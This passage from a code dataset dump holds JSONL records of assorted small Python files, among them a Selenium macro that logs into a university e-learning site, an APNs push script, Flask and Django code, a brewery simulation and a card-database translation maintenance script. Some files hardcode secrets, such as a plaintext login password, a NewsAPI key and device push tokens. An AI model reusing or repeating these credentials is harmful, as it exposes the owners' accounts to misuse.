tuple(tweet.display_text_range)\n return tweet.full_text[s:e]\n\n#%%\nfor leader in leaders:\n get_and_save_tweets(leader)","sub_path":"get_tweets/get_tweets.py","file_name":"get_tweets.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"297814210","text":"__author__ = 'coltonmcentee'\n\ndef parse_as_floats(tabbed_file_name):\n tabbed_file = open(tabbed_file_name, 'r')\n\n values = []\n for line in tabbed_file:\n if not line.startswith('#') and line != \"\":\n\n columns = line.split(\"\\t\");\n\n columns_number = tuple([float(c) for c in columns]) # list of tuples, not list of lists\n values.append(columns_number)\n\n return values","sub_path":"scripts/Tab.py","file_name":"Tab.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"651254207","text":"import os\nfrom tests.test_base import TestBase\nfrom pathlib import Path\nfrom ruamel.yaml import safe_load\nfrom capanno_utils.config import config\nfrom capanno_utils.helpers.get_paths import get_metadata_path\nfrom capanno_utils.validate_content import main\n\nclass TestValidateContent(TestBase):\n\n def test_validate_tool_metadata(self):\n self.update_tool_maps()\n with self.get_content_map_paths()['tool_maps'].open('r') as tm:\n tool_map_dict = safe_load(tm)\n base_path = config[os.environ['CONFIG_KEY']]['base_path']\n for identifier, values in tool_map_dict.items():\n path = base_path / values['path']\n\n tool_type = values['type']\n if tool_type == 'parent':\n if not 'common' in path.parts: # values[type] would be better test.\n raise ValueError(f\"Have a parent tool that is not in a common directory {path}\")\n meta_path = path\n else: # either a subtool or standalone tool.\n meta_path = get_metadata_path(path)\n main([str(meta_path), '-q'])\n return\n\n def test_validate_script_metadata(self):\n self.update_script_maps()\n script_map_path = self.get_content_map_paths()['script_maps']\n with script_map_path.open('r') as sm:\n script_map = safe_load(sm)\n base_path = config[os.environ['CONFIG_KEY']]['base_path']\n for script_identifier, script_values in script_map.items():\n metadata_path = base_path / get_metadata_path(Path(script_values['path']))\n main([str(metadata_path), '-q'])\n return\n\n\n def test_validate_workflow_metadata(self):\n self.update_workflow_maps()\n with self.get_content_map_paths()['workflow_maps'].open('r') as wm:\n workflow_map = safe_load(wm)\n base_path = config[os.environ['CONFIG_KEY']]['base_path']\n\n for workflow_identifier, workflow_values in workflow_map.items():\n metadata_path = base_path / get_metadata_path(workflow_values['path'])\n main([str(metadata_path), '-q'])\n return","sub_path":"tests/test_validate_all_metadata_in_maps.py","file_name":"test_validate_all_metadata_in_maps.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"270765672","text":"\"\"\"Date with a specific timezone\nExamples:\n date_time.date_time(2018, 12, 6, 8, 54, 32, format_=fmt)\n date_time.time(manipulate=True, manipulation_type='SUB', format_=fmt,\n hours=1)\n date_time.time()\n\"\"\"\n\nfrom os import getenv\nfrom datetime import datetime, timedelta\nimport pytz\nfrom pytz import timezone\n\nfmt = '%Y-%m-%d %H:%M:%S %Z%z'\n\ntz = getenv('TIMEZONE', 'Africa/Lagos')\n\n\nclass DateTime(object):\n \"\"\"Generates datetime according to the timezone.\"\"\"\n def __init__(self, time_zone=None):\n self.UTC = pytz.utc\n self.time_zone = timezone(time_zone) if time_zone else self.UTC\n\n def date_time(self, *arg, format_=None):\n \"\"\"Process a specified Date time.\n Args:\n *arg: The date to be parse\n year (int): The Year\n month (int): The Month\n day (int): The day\n minute (int): The minute\n second (int): The Seconds\n format_:\n Returns:\n Datetime: Formatted output\n \"\"\"\n year, month, day, hour, minute, second = arg\n utc_dt = datetime(year,\n month,\n day,\n hour,\n minute,\n second,\n tzinfo=self.UTC)\n loc_dt = utc_dt.astimezone(self.time_zone)\n return self._output(loc_dt, format_)\n\n def _now(self):\n \"\"\"Generate the current datetime.\n Returns:\n Datetime: The date time.\n \"\"\"\n now = datetime.now()\n local_dt = now.astimezone(self.time_zone)\n return local_dt\n\n def _date_manipulation(self, now, type_='ADD', **kwargs):\n \"\"\"Performs all date time manipulations on the provided datetime.\n Args:\n now (func): The date time to add to it.\n type_ (str): Type of manipulation\n **kwargs:\n minutes\n hours\n seconds\n milliseconds\n Returns:\n Datetime: The resulting date time.\n \"\"\"\n dt = now()\n\n type_mapper = {\n 'ADD': dt + timedelta(**kwargs),\n 'SUB': dt - timedelta(**kwargs),\n }\n\n exists = type_mapper.get(type_)\n new_time = type_mapper[type_] if exists else type_mapper['ADD']\n local_dt_norm = self.time_zone.normalize(new_time)\n return local_dt_norm\n\n def _output(self, local_dt, format_=None):\n \"\"\"Outputs the date time.\n Args:\n local_dt (datetime): The local datetime\n format_ (str): Strftime Format string\n Returns:\n Datetime: Formatted date time.\n \"\"\"\n return local_dt.strftime(format_) if format_ else local_dt\n\n def time(self,\n manipulate=False,\n manipulation_type='ADD',\n format_=None,\n **kwargs):\n \"\"\"Returns the datetime.\n Args:\n manipulate (bool): Toggles the date manipulation\n manipulation_type (str): The manipulation type\n format_ (str): Strtftime format string\n **kwargs (unknown): Arguments for timedelta\n minutes\n hours\n seconds\n milliseconds\n Returns:\n Datetime: The resulting datetime\n \"\"\"\n\n mapper = {\n 'NOW':\n self._output(self._now(), format_),\n 'MANIPULATE':\n self._output(\n self._date_manipulation(self._now,\n type_=manipulation_type,\n **kwargs), format_)\n }\n\n return mapper['MANIPULATE'] if manipulate else mapper['NOW']\n\n\ndate_time = DateTime(tz)\n","sub_path":"src/utils/date_time.py","file_name":"date_time.py","file_ext":"py","file_size_in_byte":3810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"356926243","text":"from brewer import Brewer\nfrom keg import Keg\nimport json\nimport logging\nimport time\n\nclass BDR:\n\n def __init__(self, simConfig):\n\n self.brewers = []\n self.distributors = []\n self.retailers = []\n self.time = 0 # time in hours\n self.timeStart = 0\n self.timeStop = 0 # set from config\n self.initialize(simConfig)\n self.logger = logging.getLogger('BDR')\n\n\n def validateBrewerConfig(self, cfg):\n\n checkKeys = ['Name','Latitude', 'Longitude', 'Kegs', 'Products','MaxInventoryVolume','KegFillPerHour']\n for key in cfg.keys():\n if key in checkKeys:\n checkKeys.remove(key)\n else:\n print('Brewer Config Error: {} not valid'.format(key))\n return False\n\n if not len(checkKeys) == 0:\n print('Brewer Config Error: Missing {}'.format(str(checkKeys)))\n return False\n\n # Validate Products\n for prod in cfg['Products']:\n prodKeys = ['Name','BatchCapacity', 'BatchParameters']\n\n for key in prod:\n if key in prodKeys:\n prodKeys.remove(key)\n else:\n print('Brewer Product Config Error: {} not valid'.format(key))\n return False\n\n if not len(prodKeys) == 0:\n print('Brewer Product Config Error: Missing {}'.format(str(prodKeys)))\n return False\n\n checkKeys = ['malting','milling', 'mash', 'lautering', 'boil', 'separation', 'fermentation', 'maturation',\n 'cellaring', 'packaging']\n\n prodParams = prod['BatchParameters']\n for key in prodParams.keys():\n\n if key in checkKeys:\n checkKeys.remove(key)\n else:\n print('Brewer Batch Config Error: {} not valid'.format(key))\n return False\n\n if not len(checkKeys) == 0:\n print('Brewer Product Config Error: Missing {}'.format(str(checkKeys)))\n return False\n\n return True\n\n\n def loadBrewers(self, config):\n with open(config, 'r') as datafile:\n data = json.load(datafile)\n brewerList = data['Brewers']\n for bcfg in brewerList:\n if self.validateBrewerConfig(bcfg):\n self.brewers.append(Brewer(bcfg))\n\n\n def initialize(self, config):\n\n with open(config,'r') as dfile:\n data = json.load(dfile)\n\n self.timeStart = data['Simulation']['time_start']\n self.timeStop = data['Simulation']['time_stop']\n self.time = self.timeStart\n\n bcfg = self.loadBrewers(config)\n # dcfg = self.loadDistributorConfigs(config)\n # rcfg = self.loadRetailerConfigs(config)\n\n def run(self):\n\n tsteps = range(int(self.timeStart), int(self.timeStop)+1)\n\n for t in tsteps:\n self.time = t\n for brewer in self.brewers:\n brewer.update(t)\n time.sleep(0.01)\n\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--inputfile', required=True, help='Config File Input')\n parser.add_argument('-f', '--logfile', required=False, default='BDR.log', help='Log File Output (default BDR.log)')\n parser.add_argument('-l', '--loglevel', required=False, default='DEBUG', help='Log File Level (default DEBUG')\n\n args = parser.parse_args()\n\n logger = logging.getLogger('BDR')\n\n if args.loglevel == 'DEBUG':\n logger.setLevel(logging.DEBUG)\n elif args.loglevel == 'WARNING':\n logger.setLevel(logging.WARNING)\n elif args.loglevel == 'ERROR':\n logger.setLevel(logging.ERROR)\n elif args.loglevel == 'INFO':\n logger.setLevel(logging.INFO)\n else:\n logger.setLevel(logging.DEBUG)\n\n fh = logging.FileHandler(args.logfile)\n fh.setLevel(logging.DEBUG)\n # create console handler with a higher log level\n ch = logging.StreamHandler()\n ch.setLevel(logging.ERROR)\n # create formatter and add it to the handlers\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n # add the handlers to the logger\n logger.addHandler(fh)\n logger.addHandler(ch)\n\n Sim = BDR(args.inputfile)\n\n Sim.run()\n\n\n","sub_path":"python/BDRSimulation.py","file_name":"BDRSimulation.py","file_ext":"py","file_size_in_byte":4425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"514042868","text":"import json\nimport requests\n\ndef speak(str):\n from win32com.client import Dispatch\n speak = Dispatch(\"SAPI.SpVoice\")\n speak.Speak(str)\n\n# speak(\"News for today\")\n\nif __name__=='__main__':\n # speak(\"News for today\")\n url=\"http://newsapi.org/v2/top-headlines?country=in&apiKey=47c2ca33ecd24419b753c88a9df9330d\"\n r=requests.get(url).text\n # print(r)\n data=json.loads(r)\n print(data[\"articles\"])\n arts=(data[\"articles\"])\n # for article in arts:\n # speak(article['title'])\n # speak(\"Next news is\")\n for i in arts:\n speak(i[\"title\"])\n speak(\"Next news is\")\n\n","sub_path":"Python/Akhbar padhke sunao.py","file_name":"Akhbar padhke sunao.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"466337595","text":"def build_docker(platform: str, docker_binary: str, registry: str) -> None:\n '\\n Build a container for the given platform\\n :param platform: Platform\\n :param docker_binary: docker binary to use (docker/nvidia-docker)\\n :param registry: Dockerhub registry name\\n :return: Id of the top level image\\n '\n tag = get_docker_tag(platform=platform, registry=registry)\n logging.info(\"Building container tagged '%s' with %s\", tag, docker_binary)\n cmd = [docker_binary, 'build', '-f', get_dockerfile(platform), '--build-arg', 'USER_ID={}'.format(os.getuid()), '--cache-from', tag, '-t', tag, 'docker']\n logging.info(\"Running command: '%s'\", ' '.join(cmd))\n check_call(cmd)\n image_id = _get_local_image_id(docker_binary=docker_binary, docker_tag=tag)\n if (not image_id):\n raise FileNotFoundError('Unable to find docker image id matching with {}'.format(tag))\n return image_id","sub_path":"Data Set/bug-fixing-5/fc102c34dddea8f6e7838c57e61c43dd7921b979--fix.py","file_name":"fc102c34dddea8f6e7838c57e61c43dd7921b979--fix.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"651661357","text":"#!/usr/bin/python\n\nimport randomfields\n\n\nlist_nu = [1, 1.5, 2]\nlist_lc = [0.05, 0.1, 0.5]\n#list_lc = [0.2]\nl = {'x':1, 'y':1, 'z':1}\nn = {'x':300, 'y':300, 'z':300}\n\nfor nu in list_nu:\n for lc in list_lc:\n name = 'matern3D_lc{lc}_nu{nu}'.format(lc=lc, nu=nu)\n my_rf = randomfields.MaternRandomField(name=name,correlation_length=lc,nu=nu,length=l,number_of_nodes=n,dim=3, seed=0)\n my_rf.simu(do_print=True)\n\n\n","sub_path":"clients/client_randomfields.py","file_name":"client_randomfields.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"339128087","text":"#===============================================\n# 브라우저 매크로 만들기\n#===============================================\nfrom selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport time\n\ndriver = webdriver.Chrome()\n\nurl = 'https://cyber.inhatc.ac.kr/Main.do?cmd=viewHome&userDTO.localeKey=ko'\n\n# 웹브라우저 불러오고 최대 크기로 만들기\ndriver.get(url)\ndriver.maximize_window()\n\nprint(driver.window_handles)\ndriver.switch_to.window(driver.window_handles[1])\ndriver.close()\ndriver.switch_to.window(driver.window_handles[0])\n# action을 사용해서 driver 제어를 위한 준비\naction = ActionChains(driver)\ntime.sleep(1)\n\n# 아이디 처리하기\ndriver.find_element_by_css_selector(\"#id\").click()\ndriver.find_element_by_css_selector(\"#id\").send_keys('2019010')\n\n# 패스워드 처리하기\ndriver.find_element_by_css_selector(\"#pw\").click()\ndriver.find_element_by_css_selector(\"#pw\").send_keys('aqua0405@')\n\ntime.sleep(1)\n# 버튼 클릭\ndriver.find_element_by_css_selector('.loginBtn').click()\n\nprint(driver.window_handles)\ndriver.switch_to.window(driver.window_handles[1])\ndriver.close()\ndriver.switch_to.window(driver.window_handles[0])\n\ndriver.find_element_by_css_selector('.ui-button.ui-widget.ui-state-default.ui-corner-all.ui-button-icon-only.ui-dialog-titlebar-close').click()\n\n#driver.close()","sub_path":"Automations/Crawling/이러닝_로그인.py","file_name":"이러닝_로그인.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"568773580","text":"from django.test import TestCase\n\nfrom animedb.models import *\nfrom .dummy_data import *\n\n\nclass AnimeDBModelTestCase(TestCase):\n def setUp(self):\n self.anime = Anime.objects.create(**dummy_anime1)\n self.cv = CharacterVoice.objects.create(**dummy_cv1)\n self.char = Character.objects.create(**dummy_char1)\n\n def test_anime_genre_relation(self):\n \"\"\"\n Check Many-to-Many relation between Anime and Genre\n \"\"\"\n genre = Genre.objects.create(name='이세계')\n self.anime.genres.add(genre)\n self.assertIn(genre, self.anime.genres.all())\n self.assertEqual(genre.name, self.anime.genres.get(name=genre.name).name)\n\n def test_character_cv_relation(self):\n \"\"\"\n Check ForeignKey relation between Character and CharacterVoice\n \"\"\"\n self.char.cv = self.cv\n self.char.save()\n self.assertEqual(self.char.cv.name, self.cv.name)\n self.assertIn(self.char, self.cv.character_set.all())\n\n def test_character_anime_relation(self):\n \"\"\"\n Check ForeignKey relation between Character and Anime\n \"\"\"\n self.char.anime = self.anime\n self.char.save()\n self.assertEqual(self.char.anime.title, self.anime.title)\n self.assertIn(self.char, self.anime.character_set.all())\n","sub_path":"animedb/tests/model_test.py","file_name":"model_test.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"161163890","text":"# -*- coding: utf-8 -*-\r\nimport sys\r\nfrom PyQt5 import QtCore as Qc, QtGui as Qg, QtWidgets as Qw #(補足1)\r\nfrom PyQt5.QtCore import Qt\r\nimport myicon\r\n\r\nfrom PyQt5.QtWidgets import QApplication, QLabel, QGraphicsOpacityEffect\r\nfrom PyQt5.QtGui import QIcon, QPixmap, QImage, QPainter\r\n\r\nclass PersonalIcon(Qw.QWidget):\r\n\r\n #----------------------------------------------\r\n # (内部処理)初期化処理\r\n #----------------------------------------------\r\n def __init__(self, parent, imgSize, image=None, text=None): #クラスの初期化\r\n\r\n super().__init__(parent) #上位クラスの初期化ルーチンを呼び出す(補足2)\r\n self.ui = myicon.Ui_Form()\r\n self.ui.setupUi(self)\r\n\r\n self.setImage(image, imgSize)\r\n self.setText(text)\r\n\r\n\r\n #----------------------------------------------\r\n # (内部処理)画像設定\r\n #----------------------------------------------\r\n def setImage(self, image, imgSize):\r\n\r\n if not image == None:\r\n pixmap = QPixmap(image)\r\n self.ui.imgField.setPixmap(pixmap.scaled(imgSize, imgSize, aspectRatioMode=Qt.KeepAspectRatio))\r\n\r\n\r\n #----------------------------------------------\r\n # (内部処理)テキスト設定\r\n #----------------------------------------------\r\n def setText(self, text):\r\n\r\n if not text == None:\r\n self.ui.textField.setText(text)\r\n\r\n\r\n #----------------------------------------------\r\n # (内部処理)透過設定\r\n #----------------------------------------------\r\n def setOpacity(self, value):\r\n opacityEffect = QGraphicsOpacityEffect()\r\n opacityEffect.setOpacity(value)\r\n self.setGraphicsEffect(opacityEffect)\r\n","sub_path":"PersonalIcon.py","file_name":"PersonalIcon.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"440461293","text":"from flask import Flask\nfrom flask_pymongo import PyMongo\nfrom flask_cors import CORS\nfrom app.config import Config\n\nmongo = PyMongo()\ncors = CORS()\n\nresources = {\n r'*': {\n 'origin': '*'\n }\n}\n\ndef create_app():\n from app.main.routes import api_blueprint\n app = Flask(__name__)\n app.config.from_object(Config)\n mongo.init_app(app)\n cors.init_app(app)\n app.register_blueprint(api_blueprint)\n return app","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"187016359","text":"from rest_framework import viewsets\nfrom rest_framework import permissions\n\nfrom halemate_auth.models import User\nfrom halemate_auth.serializers.user import (\n UserSerializer,\n UserViewSerializer,\n UserUpdateSerializer,\n)\nfrom halemate_auth.permissions import (\n isVerified,\n NoPost,\n)\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n queryset = User.objects.filter(registered_as='U')\n serializer_class = UserSerializer\n permission_classes = [permissions.IsAuthenticated, isVerified, NoPost]\n\n def get_queryset(self):\n return User.objects.filter(id=self.request.user.id).\\\n filter(registered_as='U')\n\n def get_serializer_class(self):\n serializer_class = self.serializer_class\n if self.request.method == 'GET':\n serializer_class = UserViewSerializer\n if self.request.method == 'PUT' or self.request.method == 'PATCH':\n serializer_class = UserUpdateSerializer\n return serializer_class\n","sub_path":"halemate_auth/views/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"268087666","text":"# -*- coding: utf-8 -*-\n'''\n\t\t @file: \n \t\t @date: \n\t\t @author: Carlos Adir (carlos.adir.leite@gmail.com)\n\t@description: Algoritmo de integração numerica atraves \n\n'''\n\nimport numpy as np\nimport aux\nimport sys\n\ndef Const(a, b, n, f):\n\tI = 0\n\th = (b-a)/n\n\tx = np.linspace(a, b, n)\n\ty = f(x)\n\tfor i in range(n-1):\n\t\tI += y[i]\n\tI *= h\n\treturn x, y, I\n\n\nif __name__ == \"__main__\":\n\tinp, img, show = aux.get_all(sys.argv)\n\ta, b, n, f = inp()\n\tx, y, I = Const(a, b, n, f.e)\n\tshow(I)\n\timg(a, b, n, f, x, y)\n","sub_path":"4/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"578380320","text":"import time, os\nfrom apns import APNs, Frame, Payload\n\ncert_path = 'pushcert.pem'\n# key_path = '/Users/julianhulme/signifi_certs/privKey.pem'\n\napns = APNs(use_sandbox=True, cert_file=cert_path, key_file='')\n\n# Send a notification\n\n\ntoken_julz = \"4a584c09cc8a7292558bcccbd58b5db47a4d1cf90908c8dab23133083f5fc8b1\"\ntoken_david = \"adb3e77d04e982b7251f020d69dccbcdf4e8d1b05988b72c0737741b50c53279\"\ntoken_daniel = \"ebcec145d11a072b2f72c5cfd322651f35652e0704f4af471e7895b457bf8bd2\"\n\n \nsuccessPackage = {}\nsuccessPackage[\"alert\"] = \"what's up\"\n\nsuccessPackage[\"category\"] = \"COUNTER_CATEGORY\"\nsuccessPackage[\"cardAmountProcessed\"] = 100\nsuccessPackage[\"rewardsAmountProcessed\"] = 7000\naps = {\"aps\":successPackage}\n\n\n\n\n\n\n\n# alert = PayloadAlert(\"New notification\", action_loc_key = \"Click me\")\npayload = Payload(alert=\"hi julian\", custom=aps)\n\nresult = apns.gateway_server.send_notification(token_daniel, payload)\n\n\n","sub_path":"Notifi/push.py","file_name":"push.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"317124580","text":"###########################################################################\n# This file provides maintenance on the various language files\n# 1. Create new \"xx/cards_xx.json\" files that have entries ordered as:\n# a. the card_tag entries in \"cards_db.json\"\n# b. the group_tag entries as found in \"cards_db.json\"\n# c. the super group entries (grouping across all expansions\"\n# d. any unused entries existing in the file (assumed to be work in progress)\n#\n# 2. Create new \"sets_db.json\" and \"xx/cards_xx.json\" with entries sorted alphabetically\n#\n# All output is in the designated output directory. Original files are not overwritten.\n###########################################################################\n\nimport os\nimport os.path\nimport io\nimport codecs\nimport json\nfrom shutil import copyfile\nimport argparse\nimport collections\n\nLANGUAGE_DEFAULT = \"en_us\" # default language, which takes priority\nLANGUAGE_XX = \"xx\" # language for starting a translation\n\n\ndef get_lang_dirs(path):\n # Find all valid languages.\n languages = []\n for name in os.listdir(path):\n dir_path = os.path.join(path, name)\n if os.path.isdir(dir_path):\n cards_file = os.path.join(dir_path, \"cards_\" + name + \".json\")\n sets_file = os.path.join(dir_path, \"sets_\" + name + \".json\")\n if os.path.isfile(cards_file) and os.path.isfile(sets_file):\n languages.append(name)\n return languages\n\n\ndef get_json_data(json_file_path):\n print((\"reading {}\".format(json_file_path)))\n # Read in the json from the specified file\n with codecs.open(json_file_path, \"r\", \"utf-8\") as json_file:\n data = json.load(json_file)\n assert data, \"Could not load json at: '%r' \" % json_file_path\n return data\n\n\ndef json_dict_entry(entry, separator=\"\"):\n # Return a nicely formated json dict entry.\n # It does not include the enclosing {} and removes trailing white space\n json_data = json.dumps(entry, indent=4, ensure_ascii=False, sort_keys=True)\n json_data = json_data.strip(\n \"{}\"\n ).rstrip() # Remove outer{} and then trailing whitespace\n return separator + json_data\n\n\n# Multikey sort\n# see: http://stackoverflow.com/questions/1143671/python-sorting-list-of-dictionaries-by-multiple-keys\ndef multikeysort(items, columns):\n from operator import itemgetter\n\n for c in columns[::-1]:\n items = sorted(items, key=itemgetter(c))\n return items\n\n\ndef main(args):\n ###########################################################################\n # Get all the languages, and place the default language first in the list\n ###########################################################################\n languages = get_lang_dirs(args.card_db_dir)\n languages.remove(LANGUAGE_DEFAULT)\n languages.insert(0, LANGUAGE_DEFAULT)\n if LANGUAGE_XX not in languages:\n languages.append(LANGUAGE_XX)\n print(\"Languages:\")\n print(languages)\n print()\n\n ###########################################################################\n # Make sure the directories exist to hold the output\n ###########################################################################\n\n # main output directory\n if not os.path.exists(args.output_dir):\n os.makedirs(args.output_dir)\n\n # each language directory\n for lang in languages:\n # Make sure the directory is there to hold the file\n lang_dir = os.path.join(args.output_dir, lang)\n if not os.path.exists(lang_dir):\n os.makedirs(lang_dir)\n\n ###########################################################################\n # Get the types_db information\n # Store in a list in the order found in types[]. Ordered by card_type\n # 1. card_tags, 2. group_tags, 3. super groups\n ###########################################################################\n type_parts = set()\n\n # Get the card data\n type_data = get_json_data(os.path.join(args.card_db_dir, \"types_db.json\"))\n\n # Sort the cards by cardset_tags, then card_tag\n sorted_type_data = multikeysort(type_data, [\"card_type\"])\n\n with io.open(\n os.path.join(args.output_dir, \"types_db.json\"), \"w\", encoding=\"utf-8\"\n ) as f:\n json.dump(sorted_type_data, f, indent=4, ensure_ascii=False)\n\n type_parts = list(set().union(*[set(t[\"card_type\"]) for t in sorted_type_data]))\n type_parts.sort()\n print(\"Unique Types:\")\n print(type_parts)\n print()\n\n ###########################################################################\n # Get the labels_db information\n # Store in a list in the order found.\n ###########################################################################\n all_labels = []\n\n # Get the card data\n label_data = get_json_data(os.path.join(args.card_db_dir, \"labels_db.json\"))\n\n all_labels = list(set().union(*[set(label[\"names\"]) for label in label_data]))\n\n with io.open(\n os.path.join(args.output_dir, \"labels_db.json\"), \"w\", encoding=\"utf-8\"\n ) as f:\n json.dump(label_data, f, indent=4, ensure_ascii=False)\n\n all_labels.sort()\n print(\"Labels: \")\n print(all_labels)\n print()\n ###########################################################################\n # Fix up all the xx/types_xx.json files\n # Place entries in alphabetical order\n # If entries don't exist:\n # If the default language, set from information in the \"types_db.json\" file,\n # If not the default language, set based on information from the default language.\n # Lastly, keep any extra entries that are not currently used, just in case needed\n # in the future or is a work in progress.\n ###########################################################################\n for lang in languages:\n lang_file = \"types_\" + lang + \".json\"\n fname = os.path.join(args.card_db_dir, lang, lang_file)\n if os.path.isfile(fname):\n lang_type_data = get_json_data(fname)\n else:\n lang_type_data = {}\n\n for t in sorted(type_parts):\n if t not in lang_type_data:\n if lang == LANGUAGE_DEFAULT:\n lang_type_data[t] = t\n lang_type_default = lang_type_data\n else:\n lang_type_data[t] = lang_type_default[t]\n\n with io.open(\n os.path.join(args.output_dir, lang, lang_file), \"w\", encoding=\"utf-8\"\n ) as f:\n json.dump(lang_type_data, f, indent=4, ensure_ascii=False)\n\n if lang == LANGUAGE_DEFAULT:\n lang_type_default = lang_type_data # Keep for later languages\n\n ###########################################################################\n # Get the cards_db information\n # Store in a list in the order found in cards[]. Ordered as follows:\n # 1. card_tags, 2. group_tags, 3. super groups\n ###########################################################################\n\n # Get the card data\n card_data = get_json_data(os.path.join(args.card_db_dir, \"cards_db.json\"))\n\n cards = set(card[\"card_tag\"] for card in card_data)\n groups = set(card[\"group_tag\"] for card in card_data if \"group_tag\" in card)\n super_groups = set([\"events\", \"landmarks\"])\n\n # Sort the cardset_tags\n for card in card_data:\n card[\"cardset_tags\"].sort()\n # But put all the base cards together by moving to front of the list\n if \"base\" in card[\"cardset_tags\"]:\n card[\"cardset_tags\"].remove(\"base\")\n card[\"cardset_tags\"].insert(0, \"base\")\n\n # Sort the cards by cardset_tags, then card_tag\n sorted_card_data = multikeysort(card_data, [\"cardset_tags\", \"card_tag\"])\n\n with io.open(\n os.path.join(args.output_dir, \"cards_db.json\"), \"w\", encoding=\"utf-8\"\n ) as lang_out:\n json.dump(sorted_card_data, lang_out, indent=4, ensure_ascii=False)\n\n # maintain the sorted order, but expand with groups and super_groups\n cards = [c[\"card_tag\"] for c in sorted_card_data]\n cards.extend(sorted(groups))\n cards.extend(sorted(super_groups))\n\n print(\"Cards:\")\n print(cards)\n print()\n\n ###########################################################################\n # Fix up all the cards_xx.json files\n # Place entries in the same order as given in \"cards_db.json\".\n # If entries don't exist:\n # If the default language, set base on information in the \"cards_db.json\" file,\n # If not the default language, set based on information from the default language.\n # Lastly, keep any extra entries that are not currently used, just in case needed\n # in the future or is a work in progress.\n ###########################################################################\n for lang in languages:\n\n # contruct the cards json file name\n lang_file = \"cards_\" + lang + \".json\"\n fname = os.path.join(args.card_db_dir, lang, lang_file)\n if os.path.isfile(fname):\n lang_data = get_json_data(fname)\n else:\n lang_data = {}\n\n sorted_lang_data = collections.OrderedDict()\n fields = [\"description\", \"extra\", \"name\"]\n for card_tag in cards:\n lang_card = lang_data.get(card_tag)\n # print(f'looking at {card_tag}: {lang_card}')\n if not lang_card or lang == LANGUAGE_XX:\n # Card is missing, need to add it\n lang_card = {}\n if lang == LANGUAGE_DEFAULT:\n # Default language gets bare minimum. Really need to add by hand.\n lang_card[\"extra\"] = \"\"\n lang_card[\"name\"] = card\n lang_card[\"description\"] = \"\"\n lang_card[\"untranslated\"] = fields\n lang_default = lang_data\n else:\n # All other languages should get the default languages' text\n lang_card[\"extra\"] = lang_default[card_tag][\"extra\"]\n lang_card[\"name\"] = lang_default[card_tag][\"name\"]\n lang_card[\"description\"] = lang_default[card_tag][\"description\"]\n lang_card[\"untranslated\"] = fields\n else:\n # Card exists, figure out what needs updating (don't update default language)\n if lang != LANGUAGE_DEFAULT:\n if \"untranslated\" in lang_card:\n # Has an 'untranslated' field. Process accordingly\n if not lang_card[\"untranslated\"]:\n # It is empty, so just remove it\n del lang_card[\"untranslated\"]\n else:\n # If a field remains untranslated, then replace with the default languages copy\n for field in fields:\n if field in lang_card[\"untranslated\"]:\n lang_card[field] = lang_default[card_tag][field]\n else:\n # Need to create the 'untranslated' field and update based upon existing fields\n untranslated = []\n for field in fields:\n if field not in lang_data[card_tag]:\n lang_card[field] = lang_default[card_tag][field]\n untranslated.append(field)\n if untranslated:\n # only add if something is still needing translation\n lang_card[\"untranslated\"] = untranslated\n lang_card[\"used\"] = True\n sorted_lang_data[card_tag] = lang_card\n unused = [c for c in lang_data.values() if \"used\" not in c]\n print(\n f'unused in {lang}: {len(unused)}, used: {len([c for c in lang_data.values() if \"used\" in c])}'\n )\n print([c[\"name\"] for c in unused])\n # Now keep any unused values just in case needed in the future\n for card_tag in lang_data:\n lang_card = lang_data.get(card_tag)\n if \"used\" not in lang_card:\n if lang != LANGUAGE_XX:\n lang_card[\"untranslated\"] = [\n \"Note: This card is currently not used.\"\n ]\n sorted_lang_data[card_tag] = lang_card\n else:\n del lang_card[\"used\"]\n\n # Process the file\n with io.open(\n os.path.join(args.output_dir, lang, lang_file), \"w\", encoding=\"utf-8\"\n ) as lang_out:\n json.dump(sorted_lang_data, lang_out, indent=4, ensure_ascii=False)\n\n if lang == LANGUAGE_DEFAULT:\n lang_default = lang_data # Keep for later languages\n\n ###########################################################################\n # Fix up the sets_db.json file\n # Place entries in alphabetical order\n ###########################################################################\n lang_file = \"sets_db.json\"\n set_data = get_json_data(os.path.join(args.card_db_dir, lang_file))\n\n with io.open(\n os.path.join(args.output_dir, lang_file), \"w\", encoding=\"utf-8\"\n ) as lang_out:\n json.dump(set_data, lang_out, 